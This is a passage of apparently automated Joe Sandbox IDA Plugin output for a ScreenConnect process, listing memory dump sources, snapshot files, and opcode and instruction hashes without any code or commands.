                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f41f7ffdfdeb7b73c63b7328b8488078563f08746a76659aaeac525177453731
                                                                                                              • Instruction ID: ce0c3ce2774641dfce8f430f15cf74f6269d3e3008e2ddabd5cd55336c01af28
                                                                                                              • Opcode Fuzzy Hash: f41f7ffdfdeb7b73c63b7328b8488078563f08746a76659aaeac525177453731
                                                                                                              • Instruction Fuzzy Hash: 31A1ED3590060ADFCB05DF68C590889BBB1FF99314725C69AD819AB325E771FA46CF80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10e7e437992a176d3b9a30f26e5f30c9000f8a50401581b231fe9b4004b883af
                                                                                                              • Instruction ID: f54e5f8a6f9bbb10731af8bcece09b7961e636bbab19c65b47a41abbdfc3a478
                                                                                                              • Opcode Fuzzy Hash: 10e7e437992a176d3b9a30f26e5f30c9000f8a50401581b231fe9b4004b883af
                                                                                                              • Instruction Fuzzy Hash: 84718F31F00219CBDB19EBA9C4546AEB7F2AFC8700F648129E406BB384DF35AD45CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10229988b3a482874e4e85bb602e04c855bb76a319806a79da7d8179790d32f6
                                                                                                              • Instruction ID: 2c936b77dab6beb66af165278f69f70d85612866ce59288fca392b99549064fb
                                                                                                              • Opcode Fuzzy Hash: 10229988b3a482874e4e85bb602e04c855bb76a319806a79da7d8179790d32f6
                                                                                                              • Instruction Fuzzy Hash: F1719175B00209DFDB14EB68D494AAEBBF6FF88310B1884A9E509DB361DB30DD15CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f66d236d2192e0f96b7d990f930e36b6e9892641c1268924f3c702454151885f
                                                                                                              • Instruction ID: b3c7380b39be54bea736369783209a4a78b9f5156b61416e9a840262b9864cb3
                                                                                                              • Opcode Fuzzy Hash: f66d236d2192e0f96b7d990f930e36b6e9892641c1268924f3c702454151885f
                                                                                                              • Instruction Fuzzy Hash: F3510030700206DBDB15EB78E85462FB7E6EBC6320B588979D11ADB381EF749C058BD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ead7f6a78024617eb9af203ec2de4421b7e0db2b4d0d19f8d50b3635b2ef644b
                                                                                                              • Instruction ID: e903ffb1569301ff225964758e475e01f59f2b9755bb1de746e077f3373944c8
                                                                                                              • Opcode Fuzzy Hash: ead7f6a78024617eb9af203ec2de4421b7e0db2b4d0d19f8d50b3635b2ef644b
                                                                                                              • Instruction Fuzzy Hash: 3D614C34A0020ACFDB14DF69D954AAEB7F2FF84314B148A69E519DB361DB35EC42CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2fe313dd488a09a5a73cbe51c93b464c0efb02451899cd4452a00c20ac7c704d
                                                                                                              • Instruction ID: 8cc62c596545b1ca13b771ed9c91ae448a0b463b6d7ab1ffab26573dd3b841af
                                                                                                              • Opcode Fuzzy Hash: 2fe313dd488a09a5a73cbe51c93b464c0efb02451899cd4452a00c20ac7c704d
                                                                                                              • Instruction Fuzzy Hash: E6516D35F112058FEB14DE69D4986BEF7F2EF89325F10892AE916E7300EB30E8408B50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: def7b6f1293a775bd6d6afe03a4b508a4f25b00f857b229785e109b18a8a0b1d
                                                                                                              • Instruction ID: 8802f2a320e1b0e6dba44c116e0d8a6b0a9da6d721c2a1a24d2829431a432796
                                                                                                              • Opcode Fuzzy Hash: def7b6f1293a775bd6d6afe03a4b508a4f25b00f857b229785e109b18a8a0b1d
                                                                                                              • Instruction Fuzzy Hash: 64618470A0120ADFD714DF69C484EAEBBF6AF88304F548A29E815EB350DB30F841CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3758b6b89150d0bb9d37a73e01fab3a73a333fc4838f801b066bcf843ce6fb18
                                                                                                              • Instruction ID: 77ab6cf012709914997b81574e9995796334326f3598b2c471fba831a7772d74
                                                                                                              • Opcode Fuzzy Hash: 3758b6b89150d0bb9d37a73e01fab3a73a333fc4838f801b066bcf843ce6fb18
                                                                                                              • Instruction Fuzzy Hash: 51411834A02218DFDB64DF65D998AACB7B2BF45715F2007A9E516DB3A4DB34AD80CF00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3dd28137ac223489804de1a07e3e7e98eebb10a4d0a89a8fcefff4409ab15d9
                                                                                                              • Instruction ID: 870001ca221618447c89a36e636927668d131472a30449c1a383c4e37d51843d
                                                                                                              • Opcode Fuzzy Hash: a3dd28137ac223489804de1a07e3e7e98eebb10a4d0a89a8fcefff4409ab15d9
                                                                                                              • Instruction Fuzzy Hash: 67412A38700646CFCB15DF79D59891ABBF2EF8931071989A9E51A8B3A1DB31EC04CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e45c15219d2c2de4e800577ef5d454259a74d8fa903b098e1c93fd72b50cf157
                                                                                                              • Instruction ID: 3db80e7a30f20e558c17ba6a0f92660b4f5e2991f9353bab44d7dc097a08de8f
                                                                                                              • Opcode Fuzzy Hash: e45c15219d2c2de4e800577ef5d454259a74d8fa903b098e1c93fd72b50cf157
                                                                                                              • Instruction Fuzzy Hash: F6311B38700606CFCB14DF68D598D1ABBF2FF8831071989A8E51A8B365DB31EC04CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 98643a418876797207adea2768ad0d5bb0b47e9c18c40ead077c1a3098313f20
                                                                                                              • Instruction ID: 089a554bc649501c2a5a21a6f407eee793e6323f965c301718ab3c5c3a165665
                                                                                                              • Opcode Fuzzy Hash: 98643a418876797207adea2768ad0d5bb0b47e9c18c40ead077c1a3098313f20
                                                                                                              • Instruction Fuzzy Hash: 24319E34600205CFDB18CF28D8D4A6A7BB5FF89324B054698D911DF3A9DB30F851CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a35bc9cb6b9b69a0f8c181435fbf8ca1e21a1efe93b2dd7a116ace29c3cfe57e
                                                                                                              • Instruction ID: 33a456af34a256be10b47abe8a62c7d53edb26d6de33e0eeb0936668d223eade
                                                                                                              • Opcode Fuzzy Hash: a35bc9cb6b9b69a0f8c181435fbf8ca1e21a1efe93b2dd7a116ace29c3cfe57e
                                                                                                              • Instruction Fuzzy Hash: EF414974A01209CFDB14DFA8C594A9DBBF2AF48304F148669E805EB361CB74ED44CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 50d6fcd8fe1372d78ed362b87824f43f9dd8e8dab189e1e9de9a9440b748fad8
                                                                                                              • Instruction ID: 4c7b4f488610de6b54fb7fa4f4ce585dd23821e0c8f6b4765433db8d97d35816
                                                                                                              • Opcode Fuzzy Hash: 50d6fcd8fe1372d78ed362b87824f43f9dd8e8dab189e1e9de9a9440b748fad8
                                                                                                              • Instruction Fuzzy Hash: 9931C630600B05CBC734DF7AD858A6BBBF5AF84711B144A2CD666C76E0DB70A989CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9b7dc9baa1e4ccae01bb240a9e9d7dbe6436a69e40e6f76da9e42be7c54c7669
                                                                                                              • Instruction ID: b2cd0ae0b8a55c851ee5704c2a5d156898ed00eda85b504e8243a20768b1d6f9
                                                                                                              • Opcode Fuzzy Hash: 9b7dc9baa1e4ccae01bb240a9e9d7dbe6436a69e40e6f76da9e42be7c54c7669
                                                                                                              • Instruction Fuzzy Hash: A2314BB0D0120ACFCB54DFA8C955BADBBF0BB05328F28869AD424E73D1D77086428F91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1fede55bb8c7a417702c6985e74d3cabb96b93667513624fcf7f49d1beb069de
                                                                                                              • Instruction ID: a071f3987724d0fd5b8822510772745f6d475104a6897d8dc5c21a12a3719ba4
                                                                                                              • Opcode Fuzzy Hash: 1fede55bb8c7a417702c6985e74d3cabb96b93667513624fcf7f49d1beb069de
                                                                                                              • Instruction Fuzzy Hash: A921B0353082808FC316CB69D89596ABBF6DFD671031944EEE559CB3E2CA61EC058B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09a0206d732f26672fefae59217184926e7ad97a8bf1a7791730e538a7eec038
                                                                                                              • Instruction ID: 445740aaf2f4eca2b5f0f23bd665ba68ff29f1a40599a4af1cbdfed5bb0708c0
                                                                                                              • Opcode Fuzzy Hash: 09a0206d732f26672fefae59217184926e7ad97a8bf1a7791730e538a7eec038
                                                                                                              • Instruction Fuzzy Hash: 8921A8307093018FFF11AF789994A6EBBF5AF85604B0489AAE505DF355EF34EC0587A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ea7e13407dd748e5b578ca2c6e1966c59e4c1ccba3b0acadb1fd177f32055544
                                                                                                              • Instruction ID: 0f9df7238dde2c938bc71a7619d4b3d41b9f0823a081bf83472d10563e768f73
                                                                                                              • Opcode Fuzzy Hash: ea7e13407dd748e5b578ca2c6e1966c59e4c1ccba3b0acadb1fd177f32055544
                                                                                                              • Instruction Fuzzy Hash: B7315031E0160ADBDB10DF99D4146AEBBB2EF84311F154A2AD506A7250EBB06586CF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4009579757.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_74d000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5443d03e637e28bc0c3de3c5b9bd35c9ff760e4ff9412ce077dce6bfbd9b8b5e
                                                                                                              • Instruction ID: 0a57812b73707419d8cfe47044a6d5e27fba6e9ea686266870da3c2bd3b15b0b
                                                                                                              • Opcode Fuzzy Hash: 5443d03e637e28bc0c3de3c5b9bd35c9ff760e4ff9412ce077dce6bfbd9b8b5e
                                                                                                              • Instruction Fuzzy Hash: 052167B6500240DFDB22DF14D9C0F16BF65FB88310F2481ACE9490B246C33ADC06CBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c95418d706f635c78851f29e4b2cb2c7d6a0124a094f1f8402d36d80df3bedc7
                                                                                                              • Instruction ID: 556f08e775040d30ad1a65073c2e4d815317014d91e002624dde471c13697209
                                                                                                              • Opcode Fuzzy Hash: c95418d706f635c78851f29e4b2cb2c7d6a0124a094f1f8402d36d80df3bedc7
                                                                                                              • Instruction Fuzzy Hash: 023171306012059FCF18DF68E8C9A5B7B71EF44324F10466AE816DF2E5EB70E991CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 367995f64cff30e628ca24943973d0836b997897c9a8f630b7120dddb665df8b
                                                                                                              • Instruction ID: 5188b9d59bdbc9dd177b3fba698a59cd48a183ebcd9c69513ec62af8bf9db8c8
                                                                                                              • Opcode Fuzzy Hash: 367995f64cff30e628ca24943973d0836b997897c9a8f630b7120dddb665df8b
                                                                                                              • Instruction Fuzzy Hash: FB3100B690020DAFCF14CF9AD884ADEBBF5EB48310F11842AE919A7310D775A915CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fda27b698c26706cf0f71965dc03c6f724dc5fed2cec1151a20a66925b9938d2
                                                                                                              • Instruction ID: c1eb28fa4596dc76e931fa0f2ebd1ac43e127987b6dd3d2cae89fc2943fbc1e0
                                                                                                              • Opcode Fuzzy Hash: fda27b698c26706cf0f71965dc03c6f724dc5fed2cec1151a20a66925b9938d2
                                                                                                              • Instruction Fuzzy Hash: E431C374A11218DFCB15DB68D854AADB7F6FF89211F5485A9E409E7320EB32AE81CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c9ab74cedc1b19278dc4a735b2a24e4c8ce0dac357d786221d7071c74ea7a253
                                                                                                              • Instruction ID: 1b2ac9ebae066c77f62d5ab7072c6e8d5a106f907520c71ffd5296a4efb9c9ea
                                                                                                              • Opcode Fuzzy Hash: c9ab74cedc1b19278dc4a735b2a24e4c8ce0dac357d786221d7071c74ea7a253
                                                                                                              • Instruction Fuzzy Hash: 75217C70B012198FDB10DF59C898AAEBBF6EF89354F154969D40AEB350DBB1ED01CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 46b81950db51d5b62165ad1cfb39317d012d7bdb9cf9d4bc0d1fb337753090f7
                                                                                                              • Instruction ID: e7504da880d41d2c81e9d27e1f6e94c0aa7ec0fca7847b645b40989cf106cb7f
                                                                                                              • Opcode Fuzzy Hash: 46b81950db51d5b62165ad1cfb39317d012d7bdb9cf9d4bc0d1fb337753090f7
                                                                                                              • Instruction Fuzzy Hash: 75115971A00245CFCB28DF68C945AAEBBF1EF88320F148699D515EB3E1D771E8418B80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4009579757.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_74d000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                                                                              • Instruction ID: 297f656726b6e7e5928044c1b77ebe353e20fce142e2cce754df5292e36b5be0
                                                                                                              • Opcode Fuzzy Hash: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                                                                              • Instruction Fuzzy Hash: 0811D376504284CFCF16CF10D9C4B16BF72FB98324F24C6A9D8490B256C33AD85ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60fe486147c7dd1ff7d226369014d981dc4e46639374da2bdc6fc481cd1f0405
                                                                                                              • Instruction ID: b3c03d63baf9d5ffc90b56cbc029a45e7206b84387fe3cd778f60d12e6636b85
                                                                                                              • Opcode Fuzzy Hash: 60fe486147c7dd1ff7d226369014d981dc4e46639374da2bdc6fc481cd1f0405
                                                                                                              • Instruction Fuzzy Hash: D0214278E0010ADFDB04EFA4D865A6EBBF2FF84301B108969D51AA7355DB316A12CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ded821480d56207aba397aea116ad372c10069e36a2bc7a80c3242d6a623f800
                                                                                                              • Instruction ID: 380ae98350f88c1ddb2d69bce2e3e2093bf808ffaee1778a6886ebeddde041a5
                                                                                                              • Opcode Fuzzy Hash: ded821480d56207aba397aea116ad372c10069e36a2bc7a80c3242d6a623f800
                                                                                                              • Instruction Fuzzy Hash: 7D112834B002199FDB04DBA8C864AAEB7F2EF8C304F148569D909EB361DB35EC418B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d7ca3604886576bcaf603f3d2e0e67572b6463636b9fdfc123abbc168e9c25fa
                                                                                                              • Instruction ID: 03d3d0923520d8eb28de49bdddaece945deeb638a982da603c7003bdf7b51138
                                                                                                              • Opcode Fuzzy Hash: d7ca3604886576bcaf603f3d2e0e67572b6463636b9fdfc123abbc168e9c25fa
                                                                                                              • Instruction Fuzzy Hash: 6911F274A01608CFDB14CFA8D484A9EBBF2EF8C314F108569E805EB320CB30A945CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54dbdecbe9c7033b59df9f5f3f91bae9aaaa0699aeb897a059a64a2c69d9f171
                                                                                                              • Instruction ID: 0a2bf6013fb9575a0fbdbc23404d9e873c979811f4a056b5c5ab9fc91a13b47c
                                                                                                              • Opcode Fuzzy Hash: 54dbdecbe9c7033b59df9f5f3f91bae9aaaa0699aeb897a059a64a2c69d9f171
                                                                                                              • Instruction Fuzzy Hash: 0311F3B1C002498FDB10DF9AD844BDEFBF4EB48320F15852AD959B7240D778A545CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29fbd930091d62523222a48c615ed205cd8fa8ce4bf37e258ea737c0ee64bc20
                                                                                                              • Instruction ID: e90a8823d82a6e5dbe039763fc5a70b679b7b780b5045a62d563b63336cbf82e
                                                                                                              • Opcode Fuzzy Hash: 29fbd930091d62523222a48c615ed205cd8fa8ce4bf37e258ea737c0ee64bc20
                                                                                                              • Instruction Fuzzy Hash: 3F11296650E3D18FD307C72888B85987FF5AE6326830E81DBC4C4CF2A7E655884ADB53
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1aae8b656dfc36c8236f44a445bdc56f1b0baa92d55a9497f9f790aa2b6a766a
                                                                                                              • Instruction ID: 77d7fea887d225ae8c11ed088caa19a9df5fc619e3476319406443d572a183c1
                                                                                                              • Opcode Fuzzy Hash: 1aae8b656dfc36c8236f44a445bdc56f1b0baa92d55a9497f9f790aa2b6a766a
                                                                                                              • Instruction Fuzzy Hash: 47019A35304615CFD720DB69C4A4A2AB7EAFF8C66436840A8F95A8B351CF60FC12CB80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61721c31d1dbdc7ac8c8b46ddf847f2aa99db939b7359be23d0492164c2630f3
                                                                                                              • Instruction ID: 133ac95b53ec6da1ef883a7675486426df8ea4b07a1781c6c278dcf1f1189b2a
                                                                                                              • Opcode Fuzzy Hash: 61721c31d1dbdc7ac8c8b46ddf847f2aa99db939b7359be23d0492164c2630f3
                                                                                                              • Instruction Fuzzy Hash: 6401F5313493818FC312CB29E9A69467FF5DE8221030D41EBD499CB363CE24A9099750
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd4606b26a85661b5c2a4b7b6425414a6dfa8eec780f3266aa9a27cd862609d5
                                                                                                              • Instruction ID: e1e34838477b157f5dd92d1e42c34fdaed80aa47a27645860edf76469f2a20cf
                                                                                                              • Opcode Fuzzy Hash: dd4606b26a85661b5c2a4b7b6425414a6dfa8eec780f3266aa9a27cd862609d5
